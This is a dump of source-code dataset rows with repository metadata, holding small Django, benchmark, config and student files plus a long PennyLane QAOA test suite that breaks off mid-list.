blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
19078666f52c0a258fbe2e96b9bbd9da7c8386df | 65485cb1233e59b21dd5c5349cc88a015ad52661 | /ecommerce/store/admin.py | 39642d3a049ee140025f0b9107ed07f2c0ab8b88 | []
| no_license | danielmichaels/django-projects | 966929f889c4e31508b6bbcb728ef02f00549f0b | dc8ca4b9ca788dea6388b434e9d7744e1500128f | refs/heads/master | 2022-12-25T18:50:48.192647 | 2020-10-07T00:45:13 | 2020-10-07T00:45:13 | 289,652,384 | 0 | 0 | null | 2020-10-07T00:45:14 | 2020-08-23T09:13:00 | Python | UTF-8 | Python | false | false | 262 | py | from django.contrib import admin
from .models import Product, Order, OrderItem, Customer, ShippingAddress
admin.site.register(Product)
admin.site.register(OrderItem)
admin.site.register(Order)
admin.site.register(Customer)
admin.site.register(ShippingAddress)
| [
"[email protected]"
]
| |
a0b6217aff8ab3fd4a1a3074a6882d2a1be08888 | ac235a23f22be0d6f1818bb53902177f9969813a | /benchmarks/base/run.py | e2c0dda98b3f5b281160157a52897c485b5be00c | [
"Apache-2.0",
"BSD-3-Clause"
]
| permissive | DataDog/dd-trace-py | f09d6d48c4c69aea68f999fc8a458ade5c6150cf | 1e3bd6d4edef5cda5a0831a6a7ec8e4046659d17 | refs/heads/1.x | 2023-09-01T20:25:26.746324 | 2023-09-01T18:54:37 | 2023-09-01T18:54:37 | 61,572,326 | 461 | 426 | NOASSERTION | 2023-09-14T20:38:57 | 2016-06-20T18:52:23 | Python | UTF-8 | Python | false | false | 993 | py | #!/usr/bin/env python3
import os
import subprocess
import sys
import yaml
def read_config(path):
with open(path, "r") as fp:
return yaml.load(fp, Loader=yaml.FullLoader)
def run(scenario_py, cname, cvars, output_dir):
cmd = [
"python",
scenario_py,
# necessary to copy PYTHONPATH for venvs
"--copy-env",
"--append",
os.path.join(output_dir, "results.json"),
"--name",
cname,
]
for (cvarname, cvarval) in cvars.items():
cmd.append("--{}".format(cvarname))
cmd.append(str(cvarval))
proc = subprocess.Popen(cmd)
proc.wait()
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: {} <output dir>".format(sys.argv[0]))
sys.exit(1)
output_dir = sys.argv[1]
print("Saving results to {}".format(output_dir))
config = read_config("config.yaml")
for (cname, cvars) in config.items():
run("scenario.py", cname, cvars, output_dir)
| [
"[email protected]"
]
| |
6a872863bf9df20b9bac4c7fe703de788412ad50 | 7cd6950ab3034cb0cf403ee1b8410bf475360a8d | /cwl_tutorials/common_workflow_language_user_guide/venv/bin/venv/lib/python3.7/sre_compile.py | 0943d3b031fe0bb3f5ed669976db6a095d90e07e | []
| no_license | mr-c/george_murray | ef6d5f77a4f4c0b64cbc64534ce23d7546a3cee0 | 612c68c6b27ed2d8097f1309820ccdbb05530176 | refs/heads/master | 2022-09-20T11:12:58.582547 | 2019-08-15T19:32:34 | 2019-08-15T19:32:34 | 268,844,811 | 0 | 0 | null | 2020-06-02T15:55:27 | 2020-06-02T15:55:26 | null | UTF-8 | Python | false | false | 72 | py | /Users/George1/Downloads/programs/anaconda3/lib/python3.7/sre_compile.py | [
"[email protected]"
]
| |
71ea6cbad24da6e055d2aa9a4b7228bb842df0dd | 42c48f3178a48b4a2a0aded547770027bf976350 | /google/ads/google_ads/v4/services/mobile_app_category_constant_service_client_config.py | 1f790391c546b7cd2eddb5721b1b18609c8d5f0c | [
"Apache-2.0"
]
| permissive | fiboknacky/google-ads-python | e989464a85f28baca1f28d133994c73759e8b4d6 | a5b6cede64f4d9912ae6ad26927a54e40448c9fe | refs/heads/master | 2021-08-07T20:18:48.618563 | 2020-12-11T09:21:29 | 2020-12-11T09:21:29 | 229,712,514 | 0 | 0 | Apache-2.0 | 2019-12-23T08:44:49 | 2019-12-23T08:44:49 | null | UTF-8 | Python | false | false | 837 | py | config = {
"interfaces": {
"google.ads.googleads.v4.services.MobileAppCategoryConstantService": {
"retry_codes": {
"idempotent": [
"DEADLINE_EXCEEDED",
"UNAVAILABLE"
],
"non_idempotent": []
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
}
},
"methods": {
"GetMobileAppCategoryConstant": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default"
}
}
}
}
}
| [
"[email protected]"
]
| |
9722ea47a8adfd974d8062b96ef8ae7a8bdc811a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/125/usersdata/209/29350/submittedfiles/ap1.py | 7ec69941bd321159244fcfa47e54ea52e4520abb | []
| no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 120 | py | A=float(input('Digite A:'))
B=float(input('Digite B:'))
C=float(input('Digite C:'))
if A>B:print('%F'%A)
if A>B:print(B) | [
"[email protected]"
]
| |
30f1f2705332c4549d124f51b50b3a9a72acb8d7 | 05c5f5bbc2ddfa850d4ae28148f176c5d63a4a7b | /tbkt/apps/sx_normal/urls.py | db94b6c0aa22cb4c88965821420b3e9b7610328a | []
| no_license | GUAN-YE/hd_api_djs | f7234643c06f47c03c348c7740266d45989c5e77 | 1f08cbfccc1ae2123d92670c0afed9b59ae645b8 | refs/heads/master | 2020-03-25T02:32:03.613535 | 2018-08-02T12:52:45 | 2018-08-02T12:52:45 | 143,294,216 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | # coding:utf-8
"""
2017数学常态活动
映射路径
"""
from django.conf.urls import url
from stu import views as stu_views
import views as com_views
# 学生
urlpatterns = [
url(r'stu/sign$', stu_views.r_sign), # 签到
url(r'stu/share$', stu_views.r_share), # 分享
]
# 活动公用方法
urlpatterns += [
url(r'^com/info$', com_views.r_info), # 用户积分详情
url(r'score/detail$', com_views.r_score_detail), # 用户积分信息
url(r'class/ranks$', com_views.r_class_rank), # 积分排名
url(r'award/display$', com_views.r_award_info), # 奖品静态展示
# 河南活动未下线,三门峡活动暂不用
url(r'award/winner$', com_views.r_award_winner), # 奖品静态展示
url(r'score/ranks$', com_views.r_score_rank), # 积分排名
] | [
"[email protected]"
]
| |
57d25441e5f38a14e1dfaee462ed68c7a1dd1d4d | af4f53500502faf8e0b3a97cf8f517fec80bdc5c | /tests/test_qaoa.py | dd68208c81ebf47c9dde2d5f3275f38bb3a72e56 | [
"Apache-2.0"
]
| permissive | quantshah/pennylane | c5590406674384bc6a26bd5dccc6619f9255242d | b904c966d124e66dbf82cc0b42f580db2d9a7cc1 | refs/heads/master | 2022-11-22T19:41:10.892782 | 2022-08-15T12:41:48 | 2022-08-15T12:41:48 | 355,849,206 | 0 | 0 | Apache-2.0 | 2021-04-08T09:48:31 | 2021-04-08T09:48:31 | null | UTF-8 | Python | false | false | 74,881 | py | # Copyright 2018-2020 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for the :mod:`pennylane.qaoa` submodule.
"""
import pytest
import itertools
import numpy as np
import networkx as nx
from networkx import Graph
import retworkx as rx
import pennylane as qml
from pennylane import qaoa
from pennylane.qaoa.cycle import (
edges_to_wires,
wires_to_edges,
_inner_net_flow_constraint_hamiltonian,
net_flow_constraint,
loss_hamiltonian,
_square_hamiltonian_terms,
cycle_mixer,
_partial_cycle_mixer,
out_flow_constraint,
_inner_out_flow_constraint_hamiltonian,
)
from scipy.linalg import expm
from scipy.sparse import csc_matrix, kron
#####################################################
graph = Graph()
graph.add_nodes_from([0, 1, 2])
graph.add_edges_from([(0, 1), (1, 2)])
graph_rx = rx.PyGraph()
graph_rx.add_nodes_from([0, 1, 2])
graph_rx.add_edges_from([(0, 1, ""), (1, 2, "")])
non_consecutive_graph = Graph([(0, 4), (3, 4), (2, 1), (2, 0)])
non_consecutive_graph_rx = rx.PyGraph()
non_consecutive_graph_rx.add_nodes_from([0, 1, 2, 3, 4])
non_consecutive_graph_rx.add_edges_from([(0, 4, ""), (0, 2, ""), (4, 3, ""), (2, 1, "")])
g1 = Graph([(0, 1), (1, 2)])
g1_rx = rx.PyGraph()
g1_rx.add_nodes_from([0, 1, 2])
g1_rx.add_edges_from([(0, 1, ""), (1, 2, "")])
g2 = nx.Graph([(0, 1), (1, 2), (2, 3)])
g2_rx = rx.PyGraph()
g2_rx.add_nodes_from([0, 1, 2, 3])
g2_rx.add_edges_from([(0, 1, ""), (1, 2, ""), (2, 3, "")])
b_rx = rx.PyGraph()
b_rx.add_nodes_from(["b", 1, 0.3])
b_rx.add_edges_from([(0, 1, ""), (1, 2, ""), (0, 2, "")])
def catch_warn_ExpvalCost(ansatz, hamiltonian, device, **kwargs):
"""Computes the ExpvalCost and catches the initial deprecation warning."""
with pytest.warns(UserWarning, match="is deprecated,"):
res = qml.ExpvalCost(ansatz, hamiltonian, device, **kwargs)
return res
def decompose_hamiltonian(hamiltonian):
coeffs = list(qml.math.toarray(hamiltonian.coeffs))
ops = [i.name for i in hamiltonian.ops]
wires = [i.wires for i in hamiltonian.ops]
return [coeffs, ops, wires]
def lollipop_graph_rx(mesh_nodes: int, path_nodes: int, to_directed: bool = False):
if to_directed:
g = rx.generators.directed_mesh_graph(weights=[*range(mesh_nodes)])
else:
g = rx.generators.mesh_graph(weights=[*range(mesh_nodes)])
if path_nodes < 1:
return g
for i in range(path_nodes):
g.add_node(mesh_nodes + i)
g.add_edges_from([(mesh_nodes + i - 1, mesh_nodes + i, "")])
if to_directed:
g.add_edges_from([(mesh_nodes + i, mesh_nodes + i - 1, "")])
return g
def matrix(hamiltonian: qml.Hamiltonian, n_wires: int) -> csc_matrix:
r"""Calculates the matrix representation of an input Hamiltonian in the standard basis.
Args:
hamiltonian (qml.Hamiltonian): the input Hamiltonian
n_wires (int): the total number of wires
Returns:
csc_matrix: a sparse matrix representation
"""
ops_matrices = []
for op in hamiltonian.ops:
op_wires = np.array(op.wires.tolist())
op_list = op.non_identity_obs if isinstance(op, qml.operation.Tensor) else [op]
op_matrices = []
for wire in range(n_wires):
loc = np.argwhere(op_wires == wire).flatten()
mat = np.eye(2) if len(loc) == 0 else op_list[loc[0]].matrix()
mat = csc_matrix(mat)
op_matrices.append(mat)
op_matrix = op_matrices.pop(0)
for mat in op_matrices:
op_matrix = kron(op_matrix, mat)
ops_matrices.append(op_matrix)
mat = sum(coeff * op_mat for coeff, op_mat in zip(hamiltonian.coeffs, ops_matrices))
return csc_matrix(mat)
class TestMixerHamiltonians:
"""Tests that the mixer Hamiltonians are being generated correctly"""
def test_x_mixer_output(self):
"""Tests that the output of the Pauli-X mixer is correct"""
wires = range(4)
mixer_hamiltonian = qaoa.x_mixer(wires)
mixer_coeffs = mixer_hamiltonian.coeffs
mixer_ops = [i.name for i in mixer_hamiltonian.ops]
mixer_wires = [i.wires[0] for i in mixer_hamiltonian.ops]
assert mixer_coeffs == [1, 1, 1, 1]
assert mixer_ops == ["PauliX", "PauliX", "PauliX", "PauliX"]
assert mixer_wires == [0, 1, 2, 3]
@pytest.mark.parametrize("constrained", [True, False])
def test_x_mixer_grouping(self, constrained):
"""Tests that the grouping information is set and correct"""
wires = range(4)
mixer_hamiltonian = qaoa.x_mixer(wires)
# check that all observables commute
assert all(
qml.grouping.is_commuting(o, mixer_hamiltonian.ops[0])
for o in mixer_hamiltonian.ops[1:]
)
# check that the 1-group grouping information was set
assert mixer_hamiltonian.grouping_indices is not None
assert mixer_hamiltonian.grouping_indices == [[0, 1, 2, 3]]
def test_xy_mixer_type_error(self):
"""Tests that the XY mixer throws the correct error"""
graph = [(0, 1), (1, 2)]
with pytest.raises(
ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph object, got list"
):
qaoa.xy_mixer(graph)
@pytest.mark.parametrize(
("graph", "target_hamiltonian"),
[
(
g2,
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(1),
qml.PauliY(0) @ qml.PauliY(1),
qml.PauliX(1) @ qml.PauliX(2),
qml.PauliY(1) @ qml.PauliY(2),
qml.PauliX(2) @ qml.PauliX(3),
qml.PauliY(2) @ qml.PauliY(3),
],
),
),
(
graph,
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(1),
qml.PauliY(0) @ qml.PauliY(1),
qml.PauliX(1) @ qml.PauliX(2),
qml.PauliY(1) @ qml.PauliY(2),
],
),
),
(
non_consecutive_graph,
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(4),
qml.PauliY(0) @ qml.PauliY(4),
qml.PauliX(0) @ qml.PauliX(2),
qml.PauliY(0) @ qml.PauliY(2),
qml.PauliX(4) @ qml.PauliX(3),
qml.PauliY(4) @ qml.PauliY(3),
qml.PauliX(2) @ qml.PauliX(1),
qml.PauliY(2) @ qml.PauliY(1),
],
),
),
(
g2_rx,
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(1),
qml.PauliY(0) @ qml.PauliY(1),
qml.PauliX(1) @ qml.PauliX(2),
qml.PauliY(1) @ qml.PauliY(2),
qml.PauliX(2) @ qml.PauliX(3),
qml.PauliY(2) @ qml.PauliY(3),
],
),
),
(
graph_rx,
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(1),
qml.PauliY(0) @ qml.PauliY(1),
qml.PauliX(1) @ qml.PauliX(2),
qml.PauliY(1) @ qml.PauliY(2),
],
),
),
(
non_consecutive_graph_rx,
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(4),
qml.PauliY(0) @ qml.PauliY(4),
qml.PauliX(0) @ qml.PauliX(2),
qml.PauliY(0) @ qml.PauliY(2),
qml.PauliX(4) @ qml.PauliX(3),
qml.PauliY(4) @ qml.PauliY(3),
qml.PauliX(2) @ qml.PauliX(1),
qml.PauliY(2) @ qml.PauliY(1),
],
),
),
(
Graph((np.array([0, 1]), np.array([1, 2]), np.array([2, 0]))),
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(1),
qml.PauliY(0) @ qml.PauliY(1),
qml.PauliX(0) @ qml.PauliX(2),
qml.PauliY(0) @ qml.PauliY(2),
qml.PauliX(1) @ qml.PauliX(2),
qml.PauliY(1) @ qml.PauliY(2),
],
),
),
],
)
def test_xy_mixer_output(self, graph, target_hamiltonian):
"""Tests that the output of the XY mixer is correct"""
mixer_hamiltonian = qaoa.xy_mixer(graph)
mixer_coeffs = mixer_hamiltonian.coeffs
mixer_ops = [i.name for i in mixer_hamiltonian.ops]
mixer_wires = [i.wires for i in mixer_hamiltonian.ops]
target_coeffs = target_hamiltonian.coeffs
target_ops = [i.name for i in target_hamiltonian.ops]
target_wires = [i.wires for i in target_hamiltonian.ops]
assert mixer_coeffs == target_coeffs
assert mixer_ops == target_ops
assert mixer_wires == target_wires
def test_bit_flip_mixer_errors(self):
"""Tests that the bit-flip mixer throws the correct errors"""
graph = [(0, 1), (1, 2)]
with pytest.raises(
ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph object"
):
qaoa.bit_flip_mixer(graph, 0)
n = 2
with pytest.raises(ValueError, match=r"'b' must be either 0 or 1"):
qaoa.bit_flip_mixer(Graph(graph), n)
@pytest.mark.parametrize(
("graph", "n", "target_hamiltonian"),
[
(
Graph([(0, 1)]),
1,
qml.Hamiltonian(
[0.5, -0.5, 0.5, -0.5],
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(1),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(0),
],
),
),
(
g1,
0,
qml.Hamiltonian(
[0.5, 0.5, 0.25, 0.25, 0.25, 0.25, 0.5, 0.5],
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(1),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(2),
qml.PauliX(1) @ qml.PauliZ(0),
qml.PauliX(1) @ qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(1),
],
),
),
(
g1_rx,
0,
qml.Hamiltonian(
[0.5, 0.5, 0.25, 0.25, 0.25, 0.25, 0.5, 0.5],
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(1),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(2),
qml.PauliX(1) @ qml.PauliZ(0),
qml.PauliX(1) @ qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(1),
],
),
),
(
Graph([("b", 1), (1, 0.3), (0.3, "b")]),
1,
qml.Hamiltonian(
[0.25, -0.25, -0.25, 0.25, 0.25, -0.25, -0.25, 0.25, 0.25, -0.25, -0.25, 0.25],
[
qml.PauliX("b"),
qml.PauliX("b") @ qml.PauliZ(0.3),
qml.PauliX("b") @ qml.PauliZ(1),
qml.PauliX("b") @ qml.PauliZ(1) @ qml.PauliZ(0.3),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(0.3),
qml.PauliX(1) @ qml.PauliZ("b"),
qml.PauliX(1) @ qml.PauliZ("b") @ qml.PauliZ(0.3),
qml.PauliX(0.3),
qml.PauliX(0.3) @ qml.PauliZ("b"),
qml.PauliX(0.3) @ qml.PauliZ(1),
qml.PauliX(0.3) @ qml.PauliZ(1) @ qml.PauliZ("b"),
],
),
),
(
b_rx,
1,
qml.Hamiltonian(
[0.25, -0.25, -0.25, 0.25, 0.25, -0.25, -0.25, 0.25, 0.25, -0.25, -0.25, 0.25],
[
qml.PauliX("b"),
qml.PauliX("b") @ qml.PauliZ(0.3),
qml.PauliX("b") @ qml.PauliZ(1),
qml.PauliX("b") @ qml.PauliZ(1) @ qml.PauliZ(0.3),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(0.3),
qml.PauliX(1) @ qml.PauliZ("b"),
qml.PauliX(1) @ qml.PauliZ("b") @ qml.PauliZ(0.3),
qml.PauliX(0.3),
qml.PauliX(0.3) @ qml.PauliZ(1),
qml.PauliX(0.3) @ qml.PauliZ("b"),
qml.PauliX(0.3) @ qml.PauliZ("b") @ qml.PauliZ(1),
],
),
),
],
)
def test_bit_flip_mixer_output(self, graph, n, target_hamiltonian):
"""Tests that the output of the bit-flip mixer is correct"""
mixer_hamiltonian = qaoa.bit_flip_mixer(graph, n)
assert decompose_hamiltonian(mixer_hamiltonian) == decompose_hamiltonian(target_hamiltonian)
"""GENERATES CASES TO TEST THE MAXCUT PROBLEM"""
GRAPHS = [
g1,
g1_rx,
Graph((np.array([0, 1]), np.array([1, 2]), np.array([0, 2]))),
graph,
graph_rx,
]
COST_COEFFS = [
[0.5, 0.5, -1.0],
[0.5, 0.5, -1.0],
[0.5, 0.5, 0.5, -1.5],
[0.5, 0.5, -1.0],
[0.5, 0.5, -1.0],
]
COST_TERMS = [
[qml.PauliZ(0) @ qml.PauliZ(1), qml.PauliZ(1) @ qml.PauliZ(2), qml.Identity(0)],
[qml.PauliZ(0) @ qml.PauliZ(1), qml.PauliZ(1) @ qml.PauliZ(2), qml.Identity(0)],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliZ(1) @ qml.PauliZ(2),
qml.Identity(0),
],
[qml.PauliZ(0) @ qml.PauliZ(1), qml.PauliZ(1) @ qml.PauliZ(2), qml.Identity(0)],
[qml.PauliZ(0) @ qml.PauliZ(1), qml.PauliZ(1) @ qml.PauliZ(2), qml.Identity(0)],
]
COST_HAMILTONIANS = [qml.Hamiltonian(COST_COEFFS[i], COST_TERMS[i]) for i in range(5)]
MIXER_COEFFS = [
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
]
MIXER_TERMS = [
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
]
MIXER_HAMILTONIANS = [qml.Hamiltonian(MIXER_COEFFS[i], MIXER_TERMS[i]) for i in range(5)]
MAXCUT = list(zip(GRAPHS, COST_HAMILTONIANS, MIXER_HAMILTONIANS))
"""GENERATES THE CASES TO TEST THE MAX INDEPENDENT SET PROBLEM"""
CONSTRAINED = [
True,
True,
True,
False,
False,
]
COST_COEFFS = [
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[0.75, 0.25, -0.5, 0.75, 0.25],
[0.75, 0.25, -0.5, 0.75, 0.25],
]
COST_TERMS = [
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliZ(2),
],
# [qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliZ(2),
],
]
COST_HAMILTONIANS = [qml.Hamiltonian(COST_COEFFS[i], COST_TERMS[i]) for i in range(5)]
MIXER_COEFFS = [
[0.5, 0.5, 0.25, 0.25, 0.25, 0.25, 0.5, 0.5],
[0.5, 0.5, 0.25, 0.25, 0.25, 0.25, 0.5, 0.5],
[0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
[1, 1, 1],
[1, 1, 1],
]
MIXER_TERMS = [
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(1),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(2),
qml.PauliX(1) @ qml.PauliZ(0),
qml.PauliX(1) @ qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(1),
],
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(1),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(2),
qml.PauliX(1) @ qml.PauliZ(0),
qml.PauliX(1) @ qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(1),
],
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(2),
qml.PauliX(0) @ qml.PauliZ(1),
qml.PauliX(0) @ qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(2),
qml.PauliX(1) @ qml.PauliZ(0),
qml.PauliX(1) @ qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(0),
qml.PauliX(2) @ qml.PauliZ(1),
qml.PauliX(2) @ qml.PauliZ(1) @ qml.PauliZ(0),
],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
]
MIXER_HAMILTONIANS = [qml.Hamiltonian(MIXER_COEFFS[i], MIXER_TERMS[i]) for i in range(5)]
MIS = list(zip(GRAPHS, CONSTRAINED, COST_HAMILTONIANS, MIXER_HAMILTONIANS))
"""GENERATES THE CASES TO TEST THE MIN VERTEX COVER PROBLEM"""
COST_COEFFS = [
[-1, -1, -1],
[-1, -1, -1],
[-1, -1, -1],
[0.75, -0.25, 0.5, 0.75, -0.25],
[0.75, -0.25, 0.5, 0.75, -0.25],
]
COST_TERMS = [
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliZ(2),
],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliZ(2),
],
]
COST_HAMILTONIANS = [qml.Hamiltonian(COST_COEFFS[i], COST_TERMS[i]) for i in range(5)]
MIXER_COEFFS = [
[0.5, -0.5, 0.25, -0.25, -0.25, 0.25, 0.5, -0.5],
[0.5, -0.5, 0.25, -0.25, -0.25, 0.25, 0.5, -0.5],
[0.25, -0.25, -0.25, 0.25, 0.25, -0.25, -0.25, 0.25, 0.25, -0.25, -0.25, 0.25],
[1, 1, 1],
[1, 1, 1],
]
MIXER_HAMILTONIANS = [qml.Hamiltonian(MIXER_COEFFS[i], MIXER_TERMS[i]) for i in range(5)]
MVC = list(zip(GRAPHS, CONSTRAINED, COST_HAMILTONIANS, MIXER_HAMILTONIANS))
"""GENERATES THE CASES TO TEST THE MAXCLIQUE PROBLEM"""
COST_COEFFS = [
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[0.75, 0.25, 0.25, 1],
[0.75, 0.25, 0.25, 1],
]
COST_TERMS = [
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0) @ qml.PauliZ(2), qml.PauliZ(0), qml.PauliZ(2), qml.PauliZ(1)],
[qml.PauliZ(0) @ qml.PauliZ(2), qml.PauliZ(0), qml.PauliZ(2), qml.PauliZ(1)],
]
COST_HAMILTONIANS = [qml.Hamiltonian(COST_COEFFS[i], COST_TERMS[i]) for i in range(5)]
MIXER_COEFFS = [
[0.5, 0.5, 1.0, 0.5, 0.5],
[0.5, 0.5, 1.0, 0.5, 0.5],
[1.0, 1.0, 1.0],
[1, 1, 1],
[1, 1, 1],
]
MIXER_TERMS = [
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(2),
qml.PauliX(1),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(0),
],
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(2),
qml.PauliX(1),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(0),
],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
]
MIXER_HAMILTONIANS = [qml.Hamiltonian(MIXER_COEFFS[i], MIXER_TERMS[i]) for i in range(5)]
MAXCLIQUE = list(zip(GRAPHS, CONSTRAINED, COST_HAMILTONIANS, MIXER_HAMILTONIANS))
"""GENERATES CASES TO TEST EDGE DRIVER COST HAMILTONIAN"""
GRAPHS = GRAPHS[1:-2]
GRAPHS.append(graph)
GRAPHS.append(Graph([("b", 1), (1, 2.3)]))
GRAPHS.append(graph_rx)
b1_rx = rx.PyGraph()
b1_rx.add_nodes_from(["b", 1, 2.3])
b1_rx.add_edges_from([(0, 1, ""), (1, 2, "")])
GRAPHS.append(b1_rx)
REWARDS = [
["00"],
["00", "11"],
["00", "11", "01", "10"],
["00", "01", "10"],
["00", "11", "01", "10"],
["00", "01", "10"],
]
HAMILTONIANS = [
qml.Hamiltonian(
[-0.25, -0.25, -0.25, -0.25, -0.25, -0.25],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0),
qml.PauliZ(1),
